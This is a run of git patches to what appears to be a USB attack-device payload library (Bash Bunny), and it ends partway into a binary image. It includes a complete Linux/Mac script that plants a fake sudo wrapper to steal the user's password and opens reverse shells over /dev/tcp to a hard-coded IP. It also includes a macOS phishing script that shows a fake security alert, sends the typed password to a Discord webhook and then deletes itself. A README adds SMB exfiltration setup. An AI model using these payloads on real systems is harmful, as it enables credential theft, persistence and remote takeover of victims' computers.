[PATCH 22/56] Update README.md --- .../smb_exfiltratorV2.0/README.md | 28 +++++++++---------- 1 file changed, 14 insertions(+), 14 deletions(-) diff --git a/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md b/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md index 14549d41..106e8d26 100644 --- a/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md +++ b/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md @@ -36,24 +36,24 @@ Configured to copy docx, pdf, and xlsx files by default. Change $exfil_ext# in s | White | Moving liberated files to mass storage | | Green | Finished | -## NOTICE +# NOTICE -# As of May 2019, Microsoft has disabled both SMB version 2 along with disallowing anonymous access to an SMB share. -# To fix this, first follow these instructions, then you may use both the payload.txt and the s.ps1 files. +As of May 2019, Microsoft has disabled both SMB version 2 along with disallowing anonymous access to an SMB share. +To fix this, first follow these instructions, then you may use both the payload.txt and the s.ps1 files. -## Starting from a fresh Bash Bunny +# Starting from a fresh Bash Bunny -# 1. apt update ; apt install gcc -# 2. pip install impacket -# 3. cd /tools/ -# 4. wget https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_9_19/impacket-0.9.19.tar.gz -# 5. tar -xzvf impacket-0.9.19.tar.gz ; mv -v impacket-0.9.19/ impacket/ -# 6. python impacket/examples/smbserver - ## You should see entries for both a '-username' and a '-password' +1. apt update ; apt install gcc +2. pip install impacket +3. cd /tools/ +4. wget https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_9_19/impacket-0.9.19.tar.gz +5. tar -xzvf impacket-0.9.19.tar.gz ; mv -v impacket-0.9.19/ impacket/ +6. python impacket/examples/smbserver - ## You should see entries for both a '-username' and a '-password' -# Both the username and the password have been set as 'user' and 'Password01' respectively. +Both the username and the password have been set as 'user' and 'Password01' respectively. # Changes to the payload.txt include: - # Support for SMB version 2 enabled. - # Username and password set to bypass Microsoft's disallowing of anonymous access. - # Authentication to said SMB share with credentials specified in both the payload.txt and s.ps1 files. + Support for SMB version 2 enabled. + Username and password set to bypass Microsoft's disallowing of anonymous access. + Authentication to said SMB share with credentials specified in both the payload.txt and s.ps1 files. From ffce9e1931ab4d5b5ef01672581caef4bf11691f Mon Sep 17 00:00:00 2001 From: jblk01 Date: Mon, 22 Jul 2019 23:48:15 -0500 Subject: [PATCH 23/56] Update README.md --- payloads/library/exfiltration/smb_exfiltratorV2.0/README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md b/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md index 106e8d26..f6c64d8e 100644 --- a/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md +++ b/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md @@ -54,6 +54,6 @@ Both the username and the password have been set as 'user' and 'Password01' resp # Changes to the payload.txt include: - Support for SMB version 2 enabled. - Username and password set to bypass Microsoft's disallowing of anonymous access. - Authentication to said SMB share with credentials specified in both the payload.txt and s.ps1 files. +* Support for SMB version 2 enabled. +* Username and password set to bypass Microsoft's disallowing of anonymous access. +* Authentication to said SMB share with credentials specified in both the payload.txt and s.ps1 files. From e8ab62c9e87246d8c33d7081ae7f88b26d3ffaf8 Mon Sep 17 00:00:00 2001 From: jblk01 Date: Tue, 23 Jul 2019 00:02:09 -0500 Subject: [PATCH 24/56] Update README.md --- payloads/library/exfiltration/smb_exfiltratorV2.0/README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md b/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md index f6c64d8e..55cea46d 100644 --- a/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md +++ b/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md @@ -13,11 +13,11 @@ Exfiltrates select files from users's documents folder via SMB. Liberated documents will reside in Bash Bunny loot directory under loot/smb_exfiltrator/HOSTNAME/DATE_TIME Rewrite of the original SMB Exfiltrator payload with: + * Faster copying, using robocopy multithreaded mode * Faster finish, using a EXFILTRATION_COMPLETE file * Offload logic to target PC for accurate date/time -* Clears tracks by default. -* Test-Connection handling by ICMP (no lame sleeps) +* Clears tracks by default * Hidden powershell window by default From 2c41f79fb696c3265b500cf56427c4637f463a95 Mon Sep 17 00:00:00 2001 From: jblk01 Date: Tue, 23 Jul 2019 00:03:18 -0500 Subject: [PATCH 25/56] Update README.md --- .../library/exfiltration/smb_exfiltratorV2.0/README.md | 9 --------- 1 file changed, 9 deletions(-) diff --git a/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md b/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md index 55cea46d..3e103569 100644 --- a/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md +++ b/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md @@ -12,15 +12,6 @@ Exfiltrates select files from users's documents folder via SMB. Liberated documents will reside in Bash Bunny loot directory under loot/smb_exfiltrator/HOSTNAME/DATE_TIME -Rewrite of the original SMB Exfiltrator payload with: - -* Faster copying, using robocopy multithreaded mode -* Faster finish, using a EXFILTRATION_COMPLETE file -* Offload logic to target PC for accurate date/time -* Clears tracks by default -* Hidden powershell window by default - - ## Configuration Configured to copy docx, pdf, and xlsx files by default. Change $exfil_ext# in s.ps1 to desired. From 7103031e6e775b10745c6a3ad5bb5f1e0e6cf2de Mon Sep 17 00:00:00 2001 From: root Date: Fri, 8 May 2020 08:11:07 +0530 Subject: [PATCH 26/56] Updated changes suggested by darren --- .../Root_Reverse_Shell_linux_mac/README.md | 17 ++++++ .../Root_Reverse_Shell_linux_mac/payload.sh | 55 +++++++++++++++++++ .../Root_Reverse_Shell_linux_mac/payload.txt | 49 +++++++++++++++++ 3 files changed, 121 insertions(+) create mode 100644 payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md create mode 100644 payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh create mode 100644 payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.txt diff --git a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md new file mode 100644 index 00000000..253ca4d4 --- /dev/null +++ b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md @@ -0,0 +1,17 @@ +# Root_Reverse_Shell_linux_mac + +### Since i dont have a bash bunny this is tested in digispark +### I have converted this script to bash bunny +### If any issues put in discussion i will fix it +POC DIGISPARK LINK : https://drive.google.com/open?id=1DvKX8QXHImVRZMaoTvmtreFkiL4rwYF- +### Special thanks to sudobackdoor for bash script sample +Dont forgot to change IP in payload.sh +Before using this payload don't forgot to start netcat listeners on port 4444 and 1337 +Because it gives both user shell and root shell + +When bash bunny executes payload in a machine wich is neither linux nor mac, it will download the payload.sh from server +then executes it and removes the payload.sh. + +Once the payload.sh is executed as explained in the sudobackdoor script it will gets the root credential instead of storing it it will used for getting higher privileges and gives a reverse root netcat connection. Additionaly i have added a user level netcat connection also. + +The reason for two netcat connection is user level connection established when script is executed. But to obtain root credenitals it requires time because the user need elevate his privileges to root. So initialy i have given a normal connection then after sudo execution root connection will be established. diff --git a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh new file mode 100644 index 00000000..8ce02260 --- /dev/null +++ b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh @@ -0,0 +1,55 @@ +#!/bin/bash + +if [ ! -d ~/.config/sudo ] +then + mkdir -p ~/.config/sudo +fi + +if [ -f ~/.config/sudo/sudo ] +then + rm ~/.config/sudo/sudo +fi + + +echo '#!'$SHELL >> ~/.config/sudo/sudo +cat <<'EOF' >> ~/.config/sudo/sudo +/usr/bin/sudo -n true 2>/dev/null +if [ $? -eq 0 ] +then + /usr/bin/sudo $@ +else + echo -n "[sudo] password for $USER: " + read -s pwd + echo + echo "$pwd" | /usr/bin/sudo -S true 2>/dev/null + if [ $? -eq 1 ] + then + echo "Sorry, try again." + sudo $@ + else + /usr/bin/sudo -S $@ + if [ -f ~/.bash_profile ] + then + rm ~/.bash_profile + mv ~/.darkbash ~/.bash_profile + else + rm ~/.bashrc + mv ~/.darkbashrc ~/.bashrc + fi + rm ~/.config/sudo/sudo + echo "$pwd" | sudo -S disown !$ $(sudo /bin/bash -i > /dev/tcp/192.168.0.118/1337 0<&1 2>&1) & + fi +fi +EOF + +chmod u+x ~/.config/sudo/sudo +if [ -f ~/.bash_profile ] +then + cp ~/.bash_profile ~/.darkbash + echo "export PATH=~/.config/sudo:$PATH" >> ~/.bash_profile +else + cp ~/.bashrc ~/.darkbashrc + echo "export PATH=~/.config/sudo:$PATH" >> ~/.bashrc +fi +disown !$ $(/bin/bash -i > /dev/tcp/192.168.0.118/4444 0<&1 2>&1) & +bash diff --git a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.txt b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.txt new file mode 100644 index 00000000..9a06e38d --- /dev/null +++ b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.txt @@ -0,0 +1,49 @@ +# Title: Linux/Mac Reverse Shell +# Author: Darkprince(Sridhar) +# Version: 1.0 +# +# Runs a script in the background that gives a user shell initially and waits for user to +# escalate privileges and give a root reverse shell +# +# Magenta..................Setup +# Red,Green,Blue......Executing +# Green....................Finished + + +# INITIALIZING +LED W + +# Mac keyboard works in linux and mac +ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E + +LANGUAGE='us' + +# Make sure the switch position is 1 + +# ATTACKING +LED R G B + +# Get linux,mac Termial +RUN UNITY xterm +Q DELAY 1000 +# To close opened window by linux run command +Q GUI Q +Q CTRL C +RUN OSX terminal +Q DELAY 1000 + +# If linux then clearing 'terminal' which is typed by mac run script +Q CTRL C + +# Executing bash script which is same for mac and linux +Q STRING bash /Volumes/BashBunny/payloads/switch1/payload.sh + +# The cleanup process will done by bash script +# Closing the xterm in linux +# Closing the terminal in mac even if terminal has other process COMMAND Q and ENTER key will terminates terminal +Q GUI Q +Q CTRL C +Q STRING exit +Q ENTER + +LED G From 8c13b961a3dfd9e2eb5a4524e0aa0329d56c0dc9 Mon Sep 17 00:00:00 2001 From: Darkprince <30362337+sridharas04@users.noreply.github.com> Date: Sat, 16 May 2020 14:08:56 +0530 Subject: [PATCH 27/56] Updated Description --- .../remote_access/Root_Reverse_Shell_linux_mac/README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md index 253ca4d4..143f5388 100644 --- a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md +++ b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md @@ -8,9 +8,9 @@ POC DIGISPARK LINK : https://drive.google.com/open?id=1DvKX8QXHImVRZMaoTvmtreFki Dont forgot to change IP in payload.sh Before using this payload don't forgot to start netcat listeners on port 4444 and 1337 Because it gives both user shell and root shell +Make sure switch is in 1st position. -When bash bunny executes payload in a machine wich is neither linux nor mac, it will download the payload.sh from server -then executes it and removes the payload.sh. +When bash bunny executes payload in a machine wich is neither linux nor mac, it will executes payload.sh. Once the payload.sh is executed as explained in the sudobackdoor script it will gets the root credential instead of storing it it will used for getting higher privileges and gives a reverse root netcat connection. Additionaly i have added a user level netcat connection also. From 04d19c4c94c972b621526ca33b8b0d2eb1f18c4a Mon Sep 17 00:00:00 2001 From: Darkprince <30362337+sridharas04@users.noreply.github.com> Date: Sat, 16 May 2020 14:12:42 +0530 Subject: [PATCH 28/56] Minor changes in description. --- .../remote_access/Root_Reverse_Shell_linux_mac/README.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md index 143f5388..b2412da3 100644 --- a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md +++ b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md @@ -5,10 +5,10 @@ ### If any issues put in discussion i will fix it POC DIGISPARK LINK : https://drive.google.com/open?id=1DvKX8QXHImVRZMaoTvmtreFkiL4rwYF- ### Special thanks to sudobackdoor for bash script sample -Dont forgot to change IP in payload.sh -Before using this payload don't forgot to start netcat listeners on port 4444 and 1337 -Because it gives both user shell and root shell -Make sure switch is in 1st position. +Dont forgot to change IP in payload.sh.
+Before using this payload don't forgot to start netcat listeners on port 4444 and 1337.
+It reverse connects user shell in port 4444 and root shell in port 1337.
+Make sure switch is in position 1.
When bash bunny executes payload in a machine wich is neither linux nor mac, it will executes payload.sh. From d8ba87b488289c09db35dca9f389bad68c49a10e Mon Sep 17 00:00:00 2001 From: Darkprince <30362337+sridharas04@users.noreply.github.com> Date: Sat, 16 May 2020 19:55:43 +0530 Subject: [PATCH 29/56] Corrections in README --- .../Root_Reverse_Shell_linux_mac/README.md | 10 ++++------ 1 file changed, 4 insertions(+), 6 deletions(-) diff --git a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md index b2412da3..6e6c9d56 100644 --- a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md +++ b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md @@ -5,13 +5,11 @@ ### If any issues put in discussion i will fix it POC DIGISPARK LINK : https://drive.google.com/open?id=1DvKX8QXHImVRZMaoTvmtreFkiL4rwYF- ### Special thanks to sudobackdoor for bash script sample -Dont forgot to change IP in payload.sh.
-Before using this payload don't forgot to start netcat listeners on port 4444 and 1337.
+Dont forget to change IP in payload.sh.
+Before using this payload don't forget to start netcat listeners on port 4444 and 1337.
It reverse connects user shell in port 4444 and root shell in port 1337.
Make sure switch is in position 1.
-When bash bunny executes payload in a machine wich is neither linux nor mac, it will executes payload.sh. +Once the payload.sh is executed the sudobackdoor script it will gets the root credential and It will be used for getting higher privileges and gives a reverse root netcat connection. Additionaly i have added a user level netcat connection also. -Once the payload.sh is executed as explained in the sudobackdoor script it will gets the root credential instead of storing it it will used for getting higher privileges and gives a reverse root netcat connection. Additionaly i have added a user level netcat connection also. - -The reason for two netcat connection is user level connection established when script is executed. But to obtain root credenitals it requires time because the user need elevate his privileges to root. So initialy i have given a normal connection then after sudo execution root connection will be established. +The reason for two netcat connection is user level connection established when script is executed. But to obtain root credential is required, So it waits for user to elevate his privileges to root. So initialy i have given a normal connection then after sudo execution root connection will be established. From faa24a329df2d36d23787a9d8bfa9e0092c04a0f Mon Sep 17 00:00:00 2001 From: Darkprince <30362337+sridharas04@users.noreply.github.com> Date: Sat, 16 May 2020 20:02:21 +0530 Subject: [PATCH 30/56] Minor payload changes. --- .../remote_access/Root_Reverse_Shell_linux_mac/payload.sh | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh index 8ce02260..60895f5a 100644 --- a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh +++ b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh @@ -31,10 +31,10 @@ else if [ -f ~/.bash_profile ] then rm ~/.bash_profile - mv ~/.darkbash ~/.bash_profile + mv ~/.bash_profile.bak ~/.bash_profile else rm ~/.bashrc - mv ~/.darkbashrc ~/.bashrc + mv ~/.bashrc.bak ~/.bashrc fi rm ~/.config/sudo/sudo echo "$pwd" | sudo -S disown !$ $(sudo /bin/bash -i > /dev/tcp/192.168.0.118/1337 0<&1 2>&1) & @@ -45,10 +45,10 @@ EOF chmod u+x ~/.config/sudo/sudo if [ -f ~/.bash_profile ] then - cp ~/.bash_profile ~/.darkbash + cp ~/.bash_profile ~/.bash_profile.bak echo "export PATH=~/.config/sudo:$PATH" >> ~/.bash_profile else - cp ~/.bashrc ~/.darkbashrc + cp ~/.bashrc ~/.bashrc.bak echo "export PATH=~/.config/sudo:$PATH" >> ~/.bashrc fi disown !$ $(/bin/bash -i > /dev/tcp/192.168.0.118/4444 0<&1 2>&1) & From 133f6d94aa62217d127a9580d750c99062ac9c5a Mon Sep 17 00:00:00 2001 From: 90N45 <79598596+90N45-d3v@users.noreply.github.com> Date: Fri, 28 Jul 2023 23:00:19 +0200 Subject: [PATCH 31/56] Add MacAlertPhisher --- .../phishing/MacAlertPhisher/README.md | 20 +++++++++++ .../phishing/MacAlertPhisher/payload.txt | 36 +++++++++++++++++++ .../phishing/MacAlertPhisher/script.sh | 33 +++++++++++++++++ 3 files changed, 89 insertions(+) create mode 100644 payloads/library/phishing/MacAlertPhisher/README.md create mode 100644 payloads/library/phishing/MacAlertPhisher/payload.txt create mode 100644 payloads/library/phishing/MacAlertPhisher/script.sh diff --git a/payloads/library/phishing/MacAlertPhisher/README.md b/payloads/library/phishing/MacAlertPhisher/README.md new file mode 100644 index 00000000..8d165c10 --- /dev/null +++ b/payloads/library/phishing/MacAlertPhisher/README.md @@ -0,0 +1,20 @@ +# MacAlertPhisher +* Author: 90N45 +* Version: 1.0 +* Target: Mac +* Attackmodes: HID, STORAGE + +### Description +Creates a customizable alert that prompts for the victim's credentials and shares them with you via Discord. Even after unplugging the Bash Bunny. + +### Setup +Please insert your [Discord’s Webhook](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) link into the `discord` variable in the `script.sh` file. + +### Status +| LED | State | +| --- | --- | +| Magenta solid (SETUP) | Set ATTACKMODE | +| Yellow single blink (ATTACK) | Prepaires and executes phishing-script on the victims machine | +| Green 1000ms VERYFAST blink followed by SOLID (FINISH) | Attack finished (Ready to unplug) | + +*Average runtime: 26 seconds* \ No newline at end of file diff --git a/payloads/library/phishing/MacAlertPhisher/payload.txt b/payloads/library/phishing/MacAlertPhisher/payload.txt new file mode 100644 index 00000000..532527b1 --- /dev/null +++ b/payloads/library/phishing/MacAlertPhisher/payload.txt @@ -0,0 +1,36 @@ +#!/bin/bash +# +# Title: MacAlertPhisher +# Description: Creates a customizable alert that prompts for the victim's credentials and shares them with you via Discord. Even after unplugging the Bash Bunny. +# Author: 90N45 +# Version: 1.0 +# Category: Phishing +# Attackmodes: HID, STORAGE + +LED SETUP +ATTACKMODE HID VID_0X05AC PID_0X021E STORAGE + +LED ATTACK +QUACK GUI SPACE +QUACK DELAY 1000 +QUACK STRING terminal +QUACK ENTER +QUACK DELAY 2500 + +QUACK STRING "cp /Volumes/BashBunny/payloads/${SWITCH_POSITION}/script.sh /tmp/script.sh" +QUACK ENTER +QUACK DELAY 1000 + +QUACK STRING "diskutil eject /Volumes/BashBunny/" +QUACK ENTER +QUACK STRING "chmod +x /tmp/script.sh && nohup bash /tmp/script.sh &> /dev/null &" +QUACK ENTER +QUACK GUI SPACE +QUACK DELAY 1500 +QUACK STRING terminal +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "killall Terminal" +QUACK ENTER + +LED FINISH \ No newline at end of file diff --git a/payloads/library/phishing/MacAlertPhisher/script.sh b/payloads/library/phishing/MacAlertPhisher/script.sh new file mode 100644 index 00000000..7816c787 --- /dev/null +++ b/payloads/library/phishing/MacAlertPhisher/script.sh @@ -0,0 +1,33 @@ +#!/bin/bash + +# Discord Webhook Link (NEEDED) +discord="" +# The alert's text +dialog="Your Mac has detected unusual activity. Enter your password to confirm that you are a human." +# The alert's icon (for ex. "stop", "caution", "note" or a custom path to an icon) +icon="stop" +# A custom application, that should open the alert (for ex. "Finder") +app="" +# Base64 encode the entered string to prevent an injection/syntax error +base64=false + +#### The main script + +if [[ ${app} != "" ]]; then + pwd=$(osascript -e 'tell app "'"${app}"'" to display dialog "'"${dialog}"'" default answer "" with icon '"${icon}"' buttons {"Continue"} default button "Continue" with hidden answer') +elif [[ ${app} == "" ]]; then + pwd=$(osascript -e 'display dialog "'"${dialog}"'" default answer "" with icon '"${icon}"' buttons {"Continue"} default button "Continue" with hidden answer') +fi + + +pwd=${pwd#*"button returned:Continue, text returned:"} + +if [[ ${base64} == true ]]; then + pwd=$(echo $pwd | base64) + curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"The Bash Bunny phished something (Base64 encoded): ${pwd}\"}" ${discord} +else + curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"The Bash Bunny phished something: ${pwd}\"}" ${discord} +fi + +# Self destruct +rm /tmp/script.sh \ No newline at end of file From 491e467ca03875467f1f0b8e1656fc199cc82e4e Mon Sep 17 00:00:00 2001 From: 90N45 <79598596+90N45-d3v@users.noreply.github.com> Date: Mon, 31 Jul 2023 23:15:28 +0200 Subject: [PATCH 32/56] Add alert title + optional internet check --- .../phishing/MacAlertPhisher/README.md | 4 +- .../phishing/MacAlertPhisher/payload.txt | 5 +- .../phishing/MacAlertPhisher/script.sh | 63 ++++++++++++++++--- 3 files changed, 58 insertions(+), 14 deletions(-) diff --git a/payloads/library/phishing/MacAlertPhisher/README.md b/payloads/library/phishing/MacAlertPhisher/README.md index 8d165c10..cf08e0c1 100644 --- a/payloads/library/phishing/MacAlertPhisher/README.md +++ b/payloads/library/phishing/MacAlertPhisher/README.md @@ -8,7 +8,7 @@ Creates a customizable alert that prompts for the victim's credentials and shares them with you via Discord. Even after unplugging the Bash Bunny. ### Setup -Please insert your [Discord’s Webhook](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) link into the `discord` variable in the `script.sh` file. +Please insert your [Discord’s Webhook](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) link into the `discord` variable in the `script.sh` file. Optional, you can change the other variables at the top of the `script.sh` file to your needs. ### Status | LED | State | @@ -17,4 +17,4 @@ Please insert your [Discord’s Webhook](https://support.discord.com/hc/en-us/ar | Yellow single blink (ATTACK) | Prepaires and executes phishing-script on the victims machine | | Green 1000ms VERYFAST blink followed by SOLID (FINISH) | Attack finished (Ready to unplug) | -*Average runtime: 26 seconds* \ No newline at end of file +*Average runtime: 27 seconds* \ No newline at end of file diff --git a/payloads/library/phishing/MacAlertPhisher/payload.txt b/payloads/library/phishing/MacAlertPhisher/payload.txt index 532527b1..615bd120 100644 --- a/payloads/library/phishing/MacAlertPhisher/payload.txt +++ b/payloads/library/phishing/MacAlertPhisher/payload.txt @@ -25,11 +25,12 @@ QUACK STRING "diskutil eject /Volumes/BashBunny/" QUACK ENTER QUACK STRING "chmod +x /tmp/script.sh && nohup bash /tmp/script.sh &> /dev/null &" QUACK ENTER +QUACK DELAY 2000 QUACK GUI SPACE -QUACK DELAY 1500 +QUACK DELAY 1000 QUACK STRING terminal QUACK ENTER -QUACK DELAY 500 +QUACK DELAY 1000 QUACK STRING "killall Terminal" QUACK ENTER diff --git a/payloads/library/phishing/MacAlertPhisher/script.sh b/payloads/library/phishing/MacAlertPhisher/script.sh index 7816c787..7a307031 100644 --- a/payloads/library/phishing/MacAlertPhisher/script.sh +++ b/payloads/library/phishing/MacAlertPhisher/script.sh @@ -2,32 +2,75 @@ # Discord Webhook Link (NEEDED) discord="" +# The alert's title +title="Macintosh Security Assistant" # The alert's text -dialog="Your Mac has detected unusual activity. Enter your password to confirm that you are a human." -# The alert's icon (for ex. "stop", "caution", "note" or a custom path to an icon) +dialog="Your Mac has detected unusual activity. Enter your password to confirm that you are the owner." +# The alert's icon (for ex. "stop", "caution", "note") icon="stop" # A custom application, that should open the alert (for ex. "Finder") app="" -# Base64 encode the entered string to prevent an injection/syntax error +# Base64 encode the entered string to prevent an injection/error base64=false +# Check if an internet connection is available and wait until it is before trying to send the Discord message +internet_check=false #### The main script -if [[ ${app} != "" ]]; then - pwd=$(osascript -e 'tell app "'"${app}"'" to display dialog "'"${dialog}"'" default answer "" with icon '"${icon}"' buttons {"Continue"} default button "Continue" with hidden answer') -elif [[ ${app} == "" ]]; then - pwd=$(osascript -e 'display dialog "'"${dialog}"'" default answer "" with icon '"${icon}"' buttons {"Continue"} default button "Continue" with hidden answer') -fi +date=$(date) +user=$(whoami) +if [[ ${app} != "" ]]; then + pwd=$(osascript -e 'tell app "'"${app}"'" to display dialog "'"${dialog}"'" default answer "" with icon '"${icon}"' with title "'"${title}"'" buttons {"Continue"} default button "Continue" with hidden answer') +elif [[ ${app} == "" ]]; then + pwd=$(osascript -e 'display dialog "'"${dialog}"'" default answer "" with icon '"${icon}"' with title "'"${title}"'" buttons {"Continue"} default button "Continue" with hidden answer') +fi pwd=${pwd#*"button returned:Continue, text returned:"} if [[ ${base64} == true ]]; then pwd=$(echo $pwd | base64) - curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"The Bash Bunny phished something (Base64 encoded): ${pwd}\"}" ${discord} + enc_txt="(Base64)" else - curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"The Bash Bunny phished something: ${pwd}\"}" ${discord} + enc_txt="" fi +# Discord Embed Message +embed="{ + \"embeds\": [ + { + \"color\": 14427938, + \"footer\": { + \"text\": \"Captured: ${date}\" + }, + \"author\": { + \"name\": \"Bash Bunny • MacAlertPhisher\", + \"url\": \"https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/phishing/MacAlertPhisher\", + \"icon_url\": \"https://www.gitbook.com/cdn-cgi/image/width=40,dpr=2,height=40,fit=contain,format=auto/https%3A%2F%2F3076592524-files.gitbook.io%2F~%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FnxJgJ9UdPfrcuL1U8DpL%252Ficon%252F1UaEKnAJMPWZDBVtU8Il%252Fbb.png%3Falt%3Dmedia%26token%3D43bf1669-462c-4295-b30b-94c295470371\" + }, + \"fields\": [ + { + \"name\": \"Current User\", + \"value\": \"${user}\", + \"inline\": true + }, + { + \"name\": \"Entered Credentials ${enc_txt}\", + \"value\": \"${pwd}\", + \"inline\": true + } + ] + } + ] +}" + +if [[ ${internet_check} == true ]]; then + while [[ $(ping -c1 google.com | grep -c "1 packets received") != "1" ]]; do + sleep 5 + done +fi + +curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "${embed}" ${discord} + # Self destruct rm /tmp/script.sh \ No newline at end of file From 0750db3a35ef72b79a29dc1c7a8d4236bbb0d471 Mon Sep 17 00:00:00 2001 From: 90N45 <79598596+90N45-d3v@users.noreply.github.com> Date: Mon, 31 Jul 2023 23:35:31 +0200 Subject: [PATCH 33/56] Add pictures to README.md --- payloads/library/phishing/MacAlertPhisher/README.md | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/payloads/library/phishing/MacAlertPhisher/README.md b/payloads/library/phishing/MacAlertPhisher/README.md index cf08e0c1..3b8c03eb 100644 --- a/payloads/library/phishing/MacAlertPhisher/README.md +++ b/payloads/library/phishing/MacAlertPhisher/README.md @@ -7,6 +7,10 @@ ### Description Creates a customizable alert that prompts for the victim's credentials and shares them with you via Discord. Even after unplugging the Bash Bunny. +MAcAlertPhisher_alert_preview +
+MacAlertPhisher_message_preview + ### Setup Please insert your [Discord’s Webhook](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) link into the `discord` variable in the `script.sh` file. Optional, you can change the other variables at the top of the `script.sh` file to your needs. @@ -17,4 +21,4 @@ Please insert your [Discord’s Webhook](https://support.discord.com/hc/en-us/ar | Yellow single blink (ATTACK) | Prepaires and executes phishing-script on the victims machine | | Green 1000ms VERYFAST blink followed by SOLID (FINISH) | Attack finished (Ready to unplug) | -*Average runtime: 27 seconds* \ No newline at end of file +*Average runtime: 27 seconds* From 3f21e4d7faa04adbf5e8f23961d5610e519567b6 Mon Sep 17 00:00:00 2001 From: 0iphor13 <79219148+0iphor13@users.noreply.github.com> Date: Fri, 25 Aug 2023 13:47:33 +0200 Subject: [PATCH 34/56] Created SerialNumBunny Provide payloads in the bunny serial number and execute them via PowerShell. --- .../library/execution/SerialNumBunny/1.PS1 | 15 ++++++ .../SerialNumBunny/SerialNumBunny.png | Bin 0 -> 31303 bytes .../execution/SerialNumBunny/payload.txt | 46 ++++++++++++++++++ .../execution/SerialNumBunny/readme.md | 18 +++++++ 4 files changed, 79 insertions(+) create mode 100644 payloads/library/execution/SerialNumBunny/1.PS1 create mode 100644 payloads/library/execution/SerialNumBunny/SerialNumBunny.png create mode 100644 payloads/library/execution/SerialNumBunny/payload.txt create mode 100644 payloads/library/execution/SerialNumBunny/readme.md diff --git a/payloads/library/execution/SerialNumBunny/1.PS1 b/payloads/library/execution/SerialNumBunny/1.PS1 new file mode 100644 index 00000000..0ed38dc7 --- /dev/null +++ b/payloads/library/execution/SerialNumBunny/1.PS1 @@ -0,0 +1,15 @@ +#This is just an example script, you may want to replace it with a script of your choice +$Picture=@" + + _____ _____ _____ _____ _____ _____ _____ _____ __ __ + (\___/) | __ || _ || __|| | | | __ || | || | || | || | | + (='.'=) | __ -|| ||__ || | | __ -|| | || | | || | | ||_ _| + (")_(") |_____||__|__||_____||__|__| |_____||_____||_|___||_|___| |_| + Bash Bunny by Hak5 USB Attack/Automation Platform + +"@ + +Sleep -s 5 +Write-Host -ForegroundColor red "$Picture" +Sleep -s 2 +Write-Host -ForegroundColor green "SerialNumBunny by 0iphor13" \ No newline at end of file diff --git a/payloads/library/execution/SerialNumBunny/SerialNumBunny.png b/payloads/library/execution/SerialNumBunny/SerialNumBunny.png new file mode 100644 index 0000000000000000000000000000000000000000..f03a1d7732565fb2b7db4091dd67bd130785617e GIT binary patch literal 31303 